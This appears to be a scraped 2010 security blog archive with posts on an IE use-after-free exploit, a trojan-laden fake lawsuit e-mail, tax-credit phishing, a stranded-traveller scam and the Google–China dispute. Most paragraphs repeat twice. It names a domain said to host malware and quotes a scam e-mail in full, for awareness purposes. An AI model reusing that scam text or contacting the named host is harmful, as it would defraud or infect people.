Last month, Microsoft sent flowers to a mock funeral for Internet Explorer 6, in a show of support for the ideal that the old browser should be declared defunct worldwide. But for a few years yet, the company is still bound to support the product for those users (generally businesses) who refuse to upgrade it. That's why new exploits that continue to target old browsers, such as IE6 and IE7, continue to get attention even a full year after the proper security fix -- IE8 -- has been deployed.
One of the libraries that, among other functions, helps IE to print is the target of an exploit released to the wild earlier this month. The exploit creatively overloads the system with JavaScript variables, then places function calls to IEPEERS.DLL. Once the library is effectively crashed, its used memory isn't cleaned up, enabling binary code seeded into that memory to be executed -- a classic use-after-free scenario.
Although various IE8 and Vista-era architectures protect Windows users from this scenario, Microsoft's security team said today it will take the unusual step of issuing an out-of-band update tomorrow, two weeks ahead of the usual Patch Tuesday. The update will also serve as a "cumulative roll-up," adding nine other fixes that had been planned for April 13.
Microsoft has said that Data Execution Prevention in IE8 is one of the effective workarounds for this exploit, at least until tomorrow. But the US Homeland Security Dept.'s US-CERT agency warns that DEP is only a partial fix, saying, "DEP should not be treated as a complete workaround, but DEP can mitigate the execution of attacker-supplied code in some cases." US-CERT suggests that users instead disable Active Scripting, one of the perennially sensitive elements of the old ActiveX system.
One of the libraries that, among other functions, helps IE to print is the target of an exploit released to the wild earlier this month. The exploit creatively overloads the system with JavaScript variables, then places function calls to IEPEERS.DLL. Once the library is effectively crashed, its used memory isn't cleaned up, enabling binary code seeded into that memory to be executed -- a classic use-after-free scenario.
Although various IE8 and Vista-era architectures protect Windows users from this scenario, Microsoft's security team said today it will take the unusual step of issuing an out-of-band update tomorrow, two weeks ahead of the usual Patch Tuesday. The update will also serve as a "cumulative roll-up," adding nine other fixes that had been planned for April 13.
Microsoft has said that Data Execution Prevention in IE8 is one of the effective workarounds for this exploit, at least until tomorrow. But the US Homeland Security Dept.'s US-CERT agency warns that DEP is only a partial fix, saying, "DEP should not be treated as a complete workaround, but DEP can mitigate the execution of attacker-supplied code in some cases." US-CERT suggests that users instead disable Active Scripting, one of the perennially sensitive elements of the old ActiveX system.
Friday, March 26, 2010
Fake Lawsuit Notification Attack
A few of days ago, we encountered an e-mail with a malicious RTF attachment. It was sent with a supposed lawsuit notification message.
The e-mail didn't mention any company by name and took a shotgun, rather than targeted, approach.
Today, a security blogger forwarded us (and others) his version of the e-mail:
At this point, it appears that the attachment has been replaced by hyperlink pointing to the Marcus Law Center.
It is difficult to determine whether or not the MLC site is compromised or just completely bogus. Their Our Firm page text borrows heavily from a New York lawyer's site, but that could just be a case of "honest" plagiarism.
In any case, our browsing protection feature is now blocking the sub-directory hosting the malicious file as unsafe.
The RTF file includes an embedded object that acts as a trojan dropper (Trojan-Dropper:W32/Agent.DIOY) and it drops a downloader (Trojan-Downloader:W32/Lapurd.D), which then attempts to connect to a server located in Southern China.
The earlier attachment that we saw also attempted to connect to a server in China.
SANS diary reports that a number of .edu sites have also received a similar message.
The domain, touchstoneadvisorsonline.com, is hosting the same RTF (.doc) file.
The e-mail didn't mention any company by name and took a shotgun, rather than targeted, approach.
Today, a security blogger forwarded us (and others) his version of the e-mail:
At this point, it appears that the attachment has been replaced by hyperlink pointing to the Marcus Law Center.
It is difficult to determine whether or not the MLC site is compromised or just completely bogus. Their Our Firm page text borrows heavily from a New York lawyer's site, but that could just be a case of "honest" plagiarism.
In any case, our browsing protection feature is now blocking the sub-directory hosting the malicious file as unsafe.
The RTF file includes an embedded object that acts as a trojan dropper (Trojan-Dropper:W32/Agent.DIOY) and it drops a downloader (Trojan-Downloader:W32/Lapurd.D), which then attempts to connect to a server located in Southern China.
The earlier attachment that we saw also attempted to connect to a server in China.
SANS diary reports that a number of .edu sites have also received a similar message.
The domain, touchstoneadvisorsonline.com, is hosting the same RTF (.doc) file.
Child Tax Credit is the New Phishing Bait
Who wouldn’t want some tax benefits in the current economic times? Don’t phishers and scammers know that all too well! In a new phishing scheme, We found that Child Tax Credit is being used as bait to lure parents to disclose their financial data. This attack specifically tries to convince users to make claims for credit and lower their tax burden by using their children’s education expenses.
According to the Internal Revenue Service (IRS) website [PDF], taxpayers may be able to reduce their federal income tax by up to $1,000 for each qualifying child. Making use of this information, spam email discusses the expensive education of children and quickly advises recipients to use this expense to make claims for tax credits under the numerous tax benefits provided by the IRS. They make a further appeal that as a U.S. citizen or resident, recipients should apply for their tax returns. According to the email, users can get a tax refund of $75,000 for their children’s education. To apply for a refund, users need to complete a form attached to the email message. The fraudulent email has an HTML attachment named “#1924819299.pdf.htm”.
Once the recipient clicks on the attachment, an HTML file will open that asks users to fill in data such as social security numbers, credit/debit card numbers, and related information. Unfortunately, this information is for the fraudsters to use once the user clicks the “submit” button.
Using an HTML attachment in phishing attacks is a well-known technique. There are constant variations seen in the headers and contents of these messages designed to confuse users. This time the scammers have found a new theme and a new potential target: parents. However, we are continually watching these types of attacks, particularly for any minor variations. This is more so because the deadline for filing individual tax returns (April 15, 2010) is not far away, and it won’t be surprising if there are similar spam campaigns seen during the next one to two weeks.
Scammers may further attempt to use the huge list of tax benefits as lures to trick users. We advises users to apply standard practices of not opening attachments and/or links from unsolicited emails.
According to the Internal Revenue Service (IRS) website [PDF], taxpayers may be able to reduce their federal income tax by up to $1,000 for each qualifying child. Making use of this information, spam email discusses the expensive education of children and quickly advises recipients to use this expense to make claims for tax credits under the numerous tax benefits provided by the IRS. They make a further appeal that as a U.S. citizen or resident, recipients should apply for their tax returns. According to the email, users can get a tax refund of $75,000 for their children’s education. To apply for a refund, users need to complete a form attached to the email message. The fraudulent email has an HTML attachment named “#1924819299.pdf.htm”.
Once the recipient clicks on the attachment, an HTML file will open that asks users to fill in data such as social security numbers, credit/debit card numbers, and related information. Unfortunately, this information is for the fraudsters to use once the user clicks the “submit” button.
Using an HTML attachment in phishing attacks is a well-known technique. There are constant variations seen in the headers and contents of these messages designed to confuse users. This time the scammers have found a new theme and a new potential target: parents. However, we are continually watching these types of attacks, particularly for any minor variations. This is more so because the deadline for filing individual tax returns (April 15, 2010) is not far away, and it won’t be surprising if there are similar spam campaigns seen during the next one to two weeks.
Scammers may further attempt to use the huge list of tax benefits as lures to trick users. We advises users to apply standard practices of not opening attachments and/or links from unsolicited emails.
Google denies YouTube outage speculation
Google Inc., owner of YouTube, said an outage of the popular video-sharing site Thursday was technical and not caused by outside tampering.
"YouTube is up again following a technical issue which has now been resolved," a spokeswoman for Google said in a written statement. "We know how important YouTube is for people and apologize for any inconvenience the downtime may have caused."
The outage apparently lasted for just over an hour, from roughly 7 to 8 a.m. ET.
A YouTube source said the outage was not the result of any kind of attack or related in any way to Google's recent move to stop censoring results in China.
The timing of the outage, just days after Google's announcement, had spurred speculation online.
During the time YouTube was down, Internet users were still able to access individual videos, but YouTube's main page returned a "Http/1.1 Service Unavailable" message.
The source said it's Google's default policy to not discuss the details on the cause of outages.
The search-engine giant has been embroiled in a public feud with the communist nation since January, when Google said it was the target of a "highly sophisticated and targeted attack" originating in China.
"I think many people are, understandably, looking for China to take some unique and extraordinary technical measures to 'punish' Google," said Ron Deibert, director of the Citizen Lab at the University of Toronto's Munk Centre for International Studies.
But he said that nothing along those lines has been made public.
"So far, what I have seen is business as usual, and this includes the filtering that is happening at the backbone/gateway levels that have been more or less consistent for a long period of time.
"As for the source of the YouTube problems, I am sure they are investigating, and it could be a billion problems, just as it was for Wikipedia, which turned out to be a server cooling problem, according to reports."
Google began operating in China in 2006, agreeing to limited censorship of what the government there considers controversial sites.
A dashboard page posted by Google after it made its announcement shows that YouTube, one of the Internet's most popular sites, has been blocked in mainland China for the past four days.
View the page
Google Sites and Blogger also have been blocked, while other Google properties like photo site Picasa and Google Docs have been partially blocked, according to the page.
Web search and Google Images, which like other services now originate from Google servers in Hong Kong, were reporting no blockage on the page.
The YouTube downtime created much online buzz early Thursday. The term "Service Unavailable" became a trending topic, and many blogs were speculating on a possible China connection.
The outage came a day after Wikipedia, the user-created online encyclopedia, was down for several hours.
"YouTube is up again following a technical issue which has now been resolved," a spokeswoman for Google said in a written statement. "We know how important YouTube is for people and apologize for any inconvenience the downtime may have caused."
The outage apparently lasted for just over an hour, from roughly 7 to 8 a.m. ET.
A YouTube source said the outage was not the result of any kind of attack or related in any way to Google's recent move to stop censoring results in China.
The timing of the outage, just days after Google's announcement, had spurred speculation online.
During the time YouTube was down, Internet users were still able to access individual videos, but YouTube's main page returned a "Http/1.1 Service Unavailable" message.
The source said it's Google's default policy to not discuss the details on the cause of outages.
The search-engine giant has been embroiled in a public feud with the communist nation since January, when Google said it was the target of a "highly sophisticated and targeted attack" originating in China.
"I think many people are, understandably, looking for China to take some unique and extraordinary technical measures to 'punish' Google," said Ron Deibert, director of the Citizen Lab at the University of Toronto's Munk Centre for International Studies.
But he said that nothing along those lines has been made public.
"So far, what I have seen is business as usual, and this includes the filtering that is happening at the backbone/gateway levels that have been more or less consistent for a long period of time.
"As for the source of the YouTube problems, I am sure they are investigating, and it could be a billion problems, just as it was for Wikipedia, which turned out to be a server cooling problem, according to reports."
Google began operating in China in 2006, agreeing to limited censorship of what the government there considers controversial sites.
A dashboard page posted by Google after it made its announcement shows that YouTube, one of the Internet's most popular sites, has been blocked in mainland China for the past four days.
View the page
Google Sites and Blogger also have been blocked, while other Google properties like photo site Picasa and Google Docs have been partially blocked, according to the page.
Web search and Google Images, which like other services now originate from Google servers in Hong Kong, were reporting no blockage on the page.
The YouTube downtime created much online buzz early Thursday. The term "Service Unavailable" became a trending topic, and many blogs were speculating on a possible China connection.
The outage came a day after Wikipedia, the user-created online encyclopedia, was down for several hours.
Google, China trade shots
Google and the Chinese government are continuing to trade shots in the PR battle over net censorship. Earlier in the week, Google moved its Chinese search facility to Hong Kong where it claims it is legal under Chinese law to provide searches without censoring results.
In China:
The Chinese government slashed Google in an op-ed piece in China Daily. The op ed, under the name of Ding Yifan, included the assertion:
“Google's withdrawal is not a purely commercial act. The incident has from the beginning been implicated in Washington's political games with China.”
China Daily op ed here: “Google's exit a deliberate plot”
In Washington:
Google’s Director of Public Policy, Alan Davidson, testified before the U.S. Congressional-Executive Commission on China yesterday. His remarks stressed the free trade and rule-of-law implications of China’s actions and ask the U.S. government to consider diplomatic and other actions against the dozens of countries in the world that restrict Internet access.
“We should continue to look for effective ways to address unfair foreign trade barriers in the online world: to use trade agreements, trade tools, and trade diplomacy to promote the free flow of information on the Internet,” he said.
Transcript of testimony here.
Google has nothing (else) to lose in all of this. The Chinese government made the search giant’s position in China untenable with the (assumed) hacking of dissidents’ Gmail accounts and intransigence on net censorship.
China’s human rights record is bad enough that it isn’t going to lose much face on that front. A huge number of businesses that want to get into the vast Chinese market probably don’t care about that anyway. Google, however, can paint China as business-hostile by making an issue of the country’s lack of rule of law, (alleged) government-sponsored hacking to steal proprietary information and arbitrary regulations.
In China:
The Chinese government slashed Google in an op-ed piece in China Daily. The op ed, under the name of Ding Yifan, included the assertion:
“Google's withdrawal is not a purely commercial act. The incident has from the beginning been implicated in Washington's political games with China.”
China Daily op ed here: “Google's exit a deliberate plot”
In Washington:
Google’s Director of Public Policy, Alan Davidson, testified before the U.S. Congressional-Executive Commission on China yesterday. His remarks stressed the free trade and rule-of-law implications of China’s actions and ask the U.S. government to consider diplomatic and other actions against the dozens of countries in the world that restrict Internet access.
“We should continue to look for effective ways to address unfair foreign trade barriers in the online world: to use trade agreements, trade tools, and trade diplomacy to promote the free flow of information on the Internet,” he said.
Transcript of testimony here.
Google has nothing (else) to lose in all of this. The Chinese government made the search giant’s position in China untenable with the (assumed) hacking of dissidents’ Gmail accounts and intransigence on net censorship.
China’s human rights record is bad enough that it isn’t going to lose much face on that front. A huge number of businesses that want to get into the vast Chinese market probably don’t care about that anyway. Google, however, can paint China as business-hostile by making an issue of the country’s lack of rule of law, (alleged) government-sponsored hacking to steal proprietary information and arbitrary regulations.
Firefox, IE8 and Safari hacked at CanSecWest
In the Pwn2Own hacking contest at the CanSecWest security conference in Vancouver, Canada, security researchers and hackers quickly hacked three of the major browsers to take control of the underline operating systems.
-- A German hacker who goes by the handle "Nils" used a previously unknown vulnerability in Mozilla’s Firefox to gain control of a 64-bit Windows 7 machine.
-- Peter Vreugdenhil an independent researcher from the Netherlands, used several vulnerabilities in Internet Explorer to take control of a machine running a patched 64-bit Windows 7 implementation.
-- Researcher Charlie Miller used a vulnerability in the Safari browser to take control of a Mac Book.
The winners of the contest get cash prizes and get to keep the machines they hack.
TippingPoint’s Zero Day Initiative, which sponsored the contest, owns the rights to the hacks and will present the details to Mozilla, Microsoft and Apple so those company can issue patches before details are made public.
TippingPoint has put up $100,000 in prizes for the contest. This is its fourth year.
PCWorld story here.
More details in Computerworld story here.
This is a very high-profile event that helps focus the world’s attention on security vulnerabilities without anyone losing their banking logins, credit card numbers or account balance. The big lesson this year is that all browsers have vulnerabilities that can be exploited by malicious web sites and are often the way in to an operating system. Web users would be well advised to keep alert for updates no matter which one they use.
Various commentators are foaming at the mouth about Windows 7 weaknesses ("a FULLY PATCHED 64 bit Windows 7 installation!"), a Mac being hacked ("see, enterprises shouldn't rely on the security of OS X!") and the fact that Ubuntu Linux was NOT hacked ("aw, they just didn't give them enough time!")
It's a passion thing: love me, love my OS.
-- A German hacker who goes by the handle "Nils" used a previously unknown vulnerability in Mozilla’s Firefox to gain control of a 64-bit Windows 7 machine.
-- Peter Vreugdenhil an independent researcher from the Netherlands, used several vulnerabilities in Internet Explorer to take control of a machine running a patched 64-bit Windows 7 implementation.
-- Researcher Charlie Miller used a vulnerability in the Safari browser to take control of a Mac Book.
The winners of the contest get cash prizes and get to keep the machines they hack.
TippingPoint’s Zero Day Initiative, which sponsored the contest, owns the rights to the hacks and will present the details to Mozilla, Microsoft and Apple so those company can issue patches before details are made public.
TippingPoint has put up $100,000 in prizes for the contest. This is its fourth year.
PCWorld story here.
More details in Computerworld story here.
This is a very high-profile event that helps focus the world’s attention on security vulnerabilities without anyone losing their banking logins, credit card numbers or account balance. The big lesson this year is that all browsers have vulnerabilities that can be exploited by malicious web sites and are often the way in to an operating system. Web users would be well advised to keep alert for updates no matter which one they use.
Various commentators are foaming at the mouth about Windows 7 weaknesses ("a FULLY PATCHED 64 bit Windows 7 installation!"), a Mac being hacked ("see, enterprises shouldn't rely on the security of OS X!") and the fact that Ubuntu Linux was NOT hacked ("aw, they just didn't give them enough time!")
It's a passion thing: love me, love my OS.
Thursday, March 25, 2010
Bulgarian city official loses committee post because of Farmville addiction
Computer security category of risk: human factors?
The Sofia, Bulgaria, news site novinite.com is reporting that a city councilor in Bulgaria’s second largest city of Plovdiv was voted out of a city council committee because he wouldn’t stop playing Farmville during meetings.
The Plovdiv city hall recently got wireless Internet and city councilors got laptop computers. Two weeks ago council chairman Ilko Iliev started to get irritated by council members playing Farmville during budget hearings.
“However, the real scandal erupted during Thursday’s meeting of the City Council when the most persistent Farmville enthusiast, Dimitar Kerin from the nationalist party Ataka, was voted out of the committee he was part of because of his Facebook addiction,” novinite.com reported.
“The proposal to remove Kerin from his respective municipal committee came from Todor Hristov, a former member of Kerin’s party, who has argued that Kerin ‘needs more time for his virtual farm.’”
In his own defense, Kerin pointed out that he had reached only level 40 in Farmville, but a councilor from the Democrats for Strong Bulgaria party (rightist) had made it to level 46.
Novinite.com story here.
The Sofia, Bulgaria, news site novinite.com is reporting that a city councilor in Bulgaria’s second largest city of Plovdiv was voted out of a city council committee because he wouldn’t stop playing Farmville during meetings.
The Plovdiv city hall recently got wireless Internet and city councilors got laptop computers. Two weeks ago council chairman Ilko Iliev started to get irritated by council members playing Farmville during budget hearings.
“However, the real scandal erupted during Thursday’s meeting of the City Council when the most persistent Farmville enthusiast, Dimitar Kerin from the nationalist party Ataka, was voted out of the committee he was part of because of his Facebook addiction,” novinite.com reported.
“The proposal to remove Kerin from his respective municipal committee came from Todor Hristov, a former member of Kerin’s party, who has argued that Kerin ‘needs more time for his virtual farm.’”
In his own defense, Kerin pointed out that he had reached only level 40 in Farmville, but a councilor from the Democrats for Strong Bulgaria party (rightist) had made it to level 46.
Novinite.com story here.
It takes only one 'nice' person
In the security industry we often focus heavily on new technologies and shiny new software, and forget that so much of what we see is dependent on the person behind the computer.
Today, a co-worker of mine was sent an email from someone she doesn’t know, with the following text:
“I'm writing this with tears in my eyes,my fam and I came down here to
Wales,United Kingdom for a short vacation unfortunately we were mugged
at the park of the hotel where we stayed,all cash,credit card and cell
were stolen off us but luckily for us we still have our passports with
us.
We've been to the embassy and the Police here but they're not helping
issues at all and our flight leaves in less than 3hrs from now but
we're having problems settling the hotel bills and the hotel manager
won't let us leave until we settle the bills,i'm freaked out at the
moment.”
Being the kind and caring individual that she is, she was naturally concerned. Should she help these people out? Luckily she asked us first.
Unfortunately this type of cry for help is all too common, as we all know; an evolution of the Nigerian 419 spam. Though it has much better grammar, and does not entice us with the promise of thousands of dollars, it does play on the weakest link in the security chain; us.
Notice the feeling of helplessness (“…with tears in my eyes…”) combined with the sense of urgency (“…our flight leaves in less than 3hrs…). It is a classic example of a con.
You can have all the security in the world, the best and most expensive technology, but if you don’t educate yourself, and your co-workers…all these systems mean nothing. All you need is someone to open the door.
Today, a co-worker of mine was sent an email from someone she doesn’t know, with the following text:
“I'm writing this with tears in my eyes,my fam and I came down here to
Wales,United Kingdom for a short vacation unfortunately we were mugged
at the park of the hotel where we stayed,all cash,credit card and cell
were stolen off us but luckily for us we still have our passports with
us.
We've been to the embassy and the Police here but they're not helping
issues at all and our flight leaves in less than 3hrs from now but
we're having problems settling the hotel bills and the hotel manager
won't let us leave until we settle the bills,i'm freaked out at the
moment.”
Being the kind and caring individual that she is, she was naturally concerned. Should she help these people out? Luckily she asked us first.
Unfortunately this type of cry for help is all too common, as we all know; an evolution of the Nigerian 419 spam. Though it has much better grammar, and does not entice us with the promise of thousands of dollars, it does play on the weakest link in the security chain; us.
Notice the feeling of helplessness (“…with tears in my eyes…”) combined with the sense of urgency (“…our flight leaves in less than 3hrs…). It is a classic example of a con.
You can have all the security in the world, the best and most expensive technology, but if you don’t educate yourself, and your co-workers…all these systems mean nothing. All you need is someone to open the door.
Google-in-China saga: another hack, move to HK
There is a risk to computer security from governments. Regulatory changes, even if they are very positive measures, can impose huge demands on an enterprise (i.e. HIPPA, Sarbanes-Oxley, California’s law requiring notification of customers whose personal information is hacked on company sites.)
The “government” risk can get no bigger than the clash of Google and the government of China over the censorship issue. The world suspects that the Chinese government or its proxies were behind a campaign of hacking against Google and other major U.S companies several months ago. Google reacted to the hacks by saying in January that it would stop censoring search results for web users in China. Monday it said it would move to Hong Kong.
The government of China, which gave the search giant the choice of censoring Internet content or leaving the country, accuses Google of being a pawn of U.S. military establishment, hell bent on subverting Chinese order – the ability of the government to protect its citizens from “harmful” Internet content.
The latest hack
Reporter Mercedes Bunz of the UK’s Guardian is reporting today that a Google web page that lists corporate executives appears to have been hacked and has been redirected to a site in China. The Guardian reported the hacks to Google staff who said they were investigating.
Story here.
Analysis from both sides – playing it down in China
A large volume of news analysis today quotes observers with opinions that vary from “what were they thinking, going up against the government of China?” (NYT) to “China defended itself in an ideological battle” (Peoples’ Daily Online).
China Daily reported that Chinese Foreign Ministry spokesman Qin Gang said
“The Chinese government encouraged and pushed for the openness of Internet and its management according to its laws and regulations, which was common practice in all countries.”
Story here: “Google case will not affect China-US relations”
What was Google thinking?
The New York Times quoted J. Stapleton Roy, director of the Kissinger Institute on China and the United States at the Woodrow Wilson International Center for Scholars. “I don’t understand their calculation, I do not see how Google could have concluded that they could have faced down the Chinese on a domestic censorship issue.”
Roy is a former U. S. ambassador to China.
How much is Google giving up in revenue?
The Times said some analysts estimate that Google’s annual revenue in China was only $300 to $600 million out of $24 billion in annual sales, but investors were expecting a bright future in that country, which has 350 million web users. Google’s stock has dropped because of the shoving match with the Chinese government.
Story here: “Google Faces Fallout as China Reacts to Site Shift”
Is there a risk for China’s government?
Some have said that Google’s move to stop the censorship puts the authorities in China in a difficult spot. The government would be reluctant to anger Google users in China who are usually highly educated and who do complain, the Times said.
The paper quoted Bill Bishop, a Beijing Internet entrepreneur who writes the tech blog Digicha, “The Chinese are very serious about pushing their soft-power agenda, Google just put a big hole in that sales pitch, and I think they know that.”
In an analysis piece in the times, Michael Wines wrote:
“But China also does not acknowledge to its own people that it censors the Internet to exclude a wide range of political and social topics that its leaders believe could lead to instability. It does not release information on the number of censors it employs or the technology it uses for the world’s most sophisticated Internet firewall. Its 350 million Internet users, many with fast broadband connections, are assured they have the same effectively limitless access to information and communications that the rest of the world enjoys.”
Will forcing Google out stop innovation in China?
Wines and the reporters in Shanghai Beijing who contributed to the analysis also wrote:
“The cost, at least with some influential sectors of its own society, could be steep. In the technology sector, Google is viewed as an innovator that has spurred rapid development of the Chinese Web. Its departure will leave some Chinese companies with greater influence, but could also stifle competition, some fear.
"'Google is good at innovation, and when it leaves, the rest of the companies in China will lack motivation. Without its countervailing power, the industry won’t be as healthy,' said Zhang Yunquan, a professor at the Institute of Software at the Chinese Academy of Sciences.
“Fang Xingdong, chief executive of Chinalabs.com, said the vast majority of Chinese Internet companies invested little in research and ‘simply copy each other’s technology.’ With Google’s departure, their profits may rise, but China’s Web space will begin to stagnate, he predicted.”
Story here. “Stance by China to Limit Google Is Risk by Beijing”
What nastiness is in it for the rest of us?
It’s a clash of the Titans and there could be continuing fallout for everyone else. Although the wrestling match with Google didn't start the hacking and intellectual property theft via Internet out of China, it could focus the attentions of nationalistic and quite independent Chinese hackers. We won't even go into the issue of possible government- and military-sponsored hacks.
Enterprises should redouble user education about phishing and everybody better keep operating systems and anti-malware updated.
And, if you live outside China – enjoy the luxury of an uncensored web
The “government” risk can get no bigger than the clash of Google and the government of China over the censorship issue. The world suspects that the Chinese government or its proxies were behind a campaign of hacking against Google and other major U.S companies several months ago. Google reacted to the hacks by saying in January that it would stop censoring search results for web users in China. Monday it said it would move to Hong Kong.
The government of China, which gave the search giant the choice of censoring Internet content or leaving the country, accuses Google of being a pawn of U.S. military establishment, hell bent on subverting Chinese order – the ability of the government to protect its citizens from “harmful” Internet content.
The latest hack
Reporter Mercedes Bunz of the UK’s Guardian is reporting today that a Google web page that lists corporate executives appears to have been hacked and has been redirected to a site in China. The Guardian reported the hacks to Google staff who said they were investigating.
Story here.
Analysis from both sides – playing it down in China
A large volume of news analysis today quotes observers with opinions that vary from “what were they thinking, going up against the government of China?” (NYT) to “China defended itself in an ideological battle” (Peoples’ Daily Online).
China Daily reported that Chinese Foreign Ministry spokesman Qin Gang said
“The Chinese government encouraged and pushed for the openness of Internet and its management according to its laws and regulations, which was common practice in all countries.”
Story here: “Google case will not affect China-US relations”
What was Google thinking?
The New York Times quoted J. Stapleton Roy, director of the Kissinger Institute on China and the United States at the Woodrow Wilson International Center for Scholars. “I don’t understand their calculation, I do not see how Google could have concluded that they could have faced down the Chinese on a domestic censorship issue.”
Roy is a former U. S. ambassador to China.
How much is Google giving up in revenue?
The Times said some analysts estimate that Google’s annual revenue in China was only $300 to $600 million out of $24 billion in annual sales, but investors were expecting a bright future in that country, which has 350 million web users. Google’s stock has dropped because of the shoving match with the Chinese government.
Story here: “Google Faces Fallout as China Reacts to Site Shift”
Is there a risk for China’s government?
Some have said that Google’s move to stop the censorship puts the authorities in China in a difficult spot. The government would be reluctant to anger Google users in China who are usually highly educated and who do complain, the Times said.
The paper quoted Bill Bishop, a Beijing Internet entrepreneur who writes the tech blog Digicha, “The Chinese are very serious about pushing their soft-power agenda, Google just put a big hole in that sales pitch, and I think they know that.”
In an analysis piece in the times, Michael Wines wrote:
“But China also does not acknowledge to its own people that it censors the Internet to exclude a wide range of political and social topics that its leaders believe could lead to instability. It does not release information on the number of censors it employs or the technology it uses for the world’s most sophisticated Internet firewall. Its 350 million Internet users, many with fast broadband connections, are assured they have the same effectively limitless access to information and communications that the rest of the world enjoys.”
Will forcing Google out stop innovation in China?
Wines and the reporters in Shanghai Beijing who contributed to the analysis also wrote:
“The cost, at least with some influential sectors of its own society, could be steep. In the technology sector, Google is viewed as an innovator that has spurred rapid development of the Chinese Web. Its departure will leave some Chinese companies with greater influence, but could also stifle competition, some fear.
"'Google is good at innovation, and when it leaves, the rest of the companies in China will lack motivation. Without its countervailing power, the industry won’t be as healthy,' said Zhang Yunquan, a professor at the Institute of Software at the Chinese Academy of Sciences.
“Fang Xingdong, chief executive of Chinalabs.com, said the vast majority of Chinese Internet companies invested little in research and ‘simply copy each other’s technology.’ With Google’s departure, their profits may rise, but China’s Web space will begin to stagnate, he predicted.”
Story here. “Stance by China to Limit Google Is Risk by Beijing”
What nastiness is in it for the rest of us?
It’s a clash of the Titans and there could be continuing fallout for everyone else. Although the wrestling match with Google didn't start the hacking and intellectual property theft via Internet out of China, it could focus the attentions of nationalistic and quite independent Chinese hackers. We won't even go into the issue of possible government- and military-sponsored hacks.
Enterprises should redouble user education about phishing and everybody better keep operating systems and anti-malware updated.
And, if you live outside China – enjoy the luxury of an uncensored web
Polar opposites in U.S. Senate co-sponsor cybercrime bill
In spite of the polarized, poisonous atmosphere in Washington, D.C., generated by President Barak Obama’s health care reform campaign, two Senators from very opposite ends of the political spectrum are co-sponsoring a bill to fight international cybercrime.
U.S. Senators Kirsten Gillibrand (D-NY) and Orrin Hatch (R-UT) have cosponsored a bill aimed at fighting international cyber crime: the International Cybercrime Reporting and Cooperation Act.
If enacted into law, the bill would give the U.S. government the power to help countries that need assistance in their fight against cyber crime. It also gives the U.S. government the power to cut off financial assistance to countries that don’t crack down on net criminals.
A wide variety of Internet criminals currently rely on bullet-proof servers in countries where their crimes are tolerated. It is believed that in some countries cyber crime is protected by corrupt governments or seen as a source of income for the country as long as the victims are all foreigners.
U.S. criminal investigators and those of other countries who have evidence to shut down criminal operations often get no cooperation from law enforcement groups in countries where the crime is tolerated. Russia, many eastern European countries, Nigeria and China traditionally have topped the list of non-cooperating countries.
In their news releases on the introduction of the bill, the two senators said:
“Earlier this year, hackers in China launched a large, sophisticated attack on Google and other American businesses. A conservative estimate from the Government Accountability Office (GAO) estimates that in 2005 U.S. businesses lost $67.2 billion as a result of cyberattacks. Since then, attacks have dramatically increased. The global economy overall lost over $1 trillion in 2008 as a result of cyber attacks, according to studies by McAfee, Inc.”
The bill would:
-- Establish an annual presidential report in which the President would assess the extent of cybercrime in each country as well as the country’s efforts to fight it and protect consumers and online commerce. It also would report on multilateral efforts against cybercrime.
-- Prioritize programs designed to combat cybercrime to help countries with little information and communications technology in order to stop them from becoming cybercrime havens.
-- Provide assistance to improve finance or telecommunications infrastructure in countries that need it in order to combat cybercrime.
-- Identify countries of cyber concern: those with a pattern of cybercrime against the U.S.
-- Identify the countries that don’t deal with cybercrime “through investigations, prosecutions, bilateral or international cooperation, or appropriate legislation.”.
-- Establish an action plan to help governments of high cyber-crime countries fight it.
-- Penalize countries that fail to meet benchmarks in their action plans by cutting off financing, preferential trade programs, or new foreign assistance, as long as the penalties don’t limit projects to fight cybercrime.
-- Have the Secretary of State designate a senior official to coordinate the international fight against cybercrime and appoint employees at key embassies to focus on cybercrime policy.
We wish the Gentleman from Utah and the Lady from New York success.
Sen. Gillibrand news release here.
Sen. Hatch news release here.
U.S. Senators Kirsten Gillibrand (D-NY) and Orrin Hatch (R-UT) have cosponsored a bill aimed at fighting international cyber crime: the International Cybercrime Reporting and Cooperation Act.
If enacted into law, the bill would give the U.S. government the power to help countries that need assistance in their fight against cyber crime. It also gives the U.S. government the power to cut off financial assistance to countries that don’t crack down on net criminals.
A wide variety of Internet criminals currently rely on bullet-proof servers in countries where their crimes are tolerated. It is believed that in some countries cyber crime is protected by corrupt governments or seen as a source of income for the country as long as the victims are all foreigners.
U.S. criminal investigators and those of other countries who have evidence to shut down criminal operations often get no cooperation from law enforcement groups in countries where the crime is tolerated. Russia, many eastern European countries, Nigeria and China traditionally have topped the list of non-cooperating countries.
In their news releases on the introduction of the bill, the two senators said:
“Earlier this year, hackers in China launched a large, sophisticated attack on Google and other American businesses. A conservative estimate from the Government Accountability Office (GAO) estimates that in 2005 U.S. businesses lost $67.2 billion as a result of cyberattacks. Since then, attacks have dramatically increased. The global economy overall lost over $1 trillion in 2008 as a result of cyber attacks, according to studies by McAfee, Inc.”
The bill would:
-- Establish an annual presidential report in which the President would assess the extent of cybercrime in each country as well as the country’s efforts to fight it and protect consumers and online commerce. It also would report on multilateral efforts against cybercrime.
-- Prioritize programs designed to combat cybercrime to help countries with little information and communications technology in order to stop them from becoming cybercrime havens.
-- Provide assistance to improve finance or telecommunications infrastructure in countries that need it in order to combat cybercrime.
-- Identify countries of cyber concern: those with a pattern of cybercrime against the U.S.
-- Identify the countries that don’t deal with cybercrime “through investigations, prosecutions, bilateral or international cooperation, or appropriate legislation.”.
-- Establish an action plan to help governments of high cyber-crime countries fight it.
-- Penalize countries that fail to meet benchmarks in their action plans by cutting off financing, preferential trade programs, or new foreign assistance, as long as the penalties don’t limit projects to fight cybercrime.
-- Have the Secretary of State designate a senior official to coordinate the international fight against cybercrime and appoint employees at key embassies to focus on cybercrime policy.
We wish the Gentleman from Utah and the Lady from New York success.
Sen. Gillibrand news release here.
Sen. Hatch news release here.
Google… made in China?!?
Today at CanSecWest I stopped by the Google booth and picked up a yo-yo.
As I was about to open the package, something struck me:
‘Google… Made in China’
Oooops…….
As I was about to open the package, something struck me:
‘Google… Made in China’
Oooops…….
New social media? Pay to play online games with women?
"Dirty" or "Flirty"
Ok.
It’s an old formula for a successful business: pay girls to have fun with you.
This time the schtick is getting on-line gamers to pay $8.25 (US) to play an online game with a female for 10 minutes. The women get to keep 40 percent.
The site is GameCrush. It just opened last night and it seems to be a success (screen shots below.)
“GameCrush is being touted as the first social site for adult gamers with the women online able to set their gaming mood to either ‘flirt’ or ‘dirt’, IGN reports.
“The men online are known as Players and the women as PlayDates and Players pay to play while PlayDates get paid to play.
